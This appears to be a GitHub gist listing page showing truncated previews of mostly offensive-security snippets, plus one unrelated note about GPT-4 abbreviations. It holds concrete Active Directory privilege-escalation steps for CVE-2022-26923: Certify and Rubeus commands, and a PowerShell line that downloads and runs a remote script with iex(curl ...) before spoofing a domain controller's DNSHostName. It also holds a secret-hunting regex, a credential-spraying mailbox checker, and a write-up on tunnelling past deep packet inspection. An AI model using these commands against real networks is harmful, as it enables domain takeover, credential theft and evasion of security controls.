clandestination queencitycyber
@VictorTaelin
VictorTaelin / gpt4_abbreviations.md
Last active May 25, 2024 08:44
Notes on the GPT-4 abbreviations tweet

Notes on this tweet.

  • The screenshots were taken on different sessions.

  • The entire sessions are included on the screenshots.

  • I lost the original prompts, so I had to reconstruct them, and still managed to reproduce.

  • The "compressed" version is actually longer! Emojis and abbreviations use more tokens than common words.

@tothi
tothi / certifried_with_krbrelayup.md
Last active November 22, 2023 10:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, but requires adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) that machine. Combining these two: a non-privileged domain user escalates to Domain Admin without needing to add or own computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@dmchell
dmchell / Program.cs
Created May 12, 2022 10:41
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relevant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp)
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
@queencitycyber
queencitycyber / hbh-header-abuse-test.py
Created May 11, 2022 18:48 — forked from ndavison/hbh-header-abuse-test.py
Attempts to find hop-by-hop header abuse potential against the provided URL.
# github.com/ndavison
import requests
import random
import string
from argparse import ArgumentParser
parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.")
parser.add_argument("-u", "--url", help="URL to target (without query string)")

iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
# In my testing I had to set DNSHostName to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@puzzlepeaches
puzzlepeaches / latestpd.py
Created April 1, 2022 10:46
Download latest Linux projectdiscovery tools with Python. Comment out line 54 if you want to hold on to the zipfiles following download.
import os
import glob
import zipfile
import requests
from lastversion import latest
tools = ["nuclei", "httpx", "dnsx", "subfinder", "naabu", "shuffledns"]
def get_version(tools):
    for i in tools:
@gmurdocca
gmurdocca / socat_caesar_dpi.md
Last active January 22, 2024 05:08
Circumventing Deep Packet Inspection with Socat and rot13

Circumventing Deep Packet Inspection with Socat and rot13

I have a Linux virtual machine inside a customer's private network. For security, this VM is reachable only via VPN + Citrix + Windows + a Windows SSH client (e.g. PuTTY). I am tasked to ensure this Citrix design is secure, and users cannot access their Linux VMs or other resources on the internal private network in any way outside of using Citrix.

The VM can access the internet. This task should be easy. The VM's internet gateway allows it to connect anywhere on the internet to TCP ports 80, 443, and 8090 only. Connecting to an internet bastion box on one of these ports works and I can send and receive clear text data using netcat. I plan to use good old SSH, listening on tcp/8090 on the bastion, with a reverse port forward configured to expose sshd on the VM to the public, to show their Citrix gateway can be circumvented.

Rejected by Deep Packet Inspection

I hit an immediate snag. The moment I try to establish an SSH or SSL connection over o

@puzzlepeaches
puzzlepeaches / mailboxcheck.py
Created February 2, 2022 16:25
Lets you feed in a list of user credentials guessed during spraying to check if they have a valid mailbox for an on-prem Exchange server. Basically an easy way to tell if you are going to be able to abuse an ActiveSync endpoint or not. Need to install exchangelib for this to work.
import os
import argparse
from exchangelib import Credentials, Account, Configuration
from exchangelib.errors import ErrorNonExistentMailbox, UnauthorizedError
def args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-c", "--creds", dest="creds", help="List of known valid user credentials in the format user@acme.com:password", action='store', required=True)
    parser.add_argument("-t", "--target", dest="target", help="Target Exchange server.", action='store', required=True)
    args = parser.parse_args()

import requests
import random
import string
import sys
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):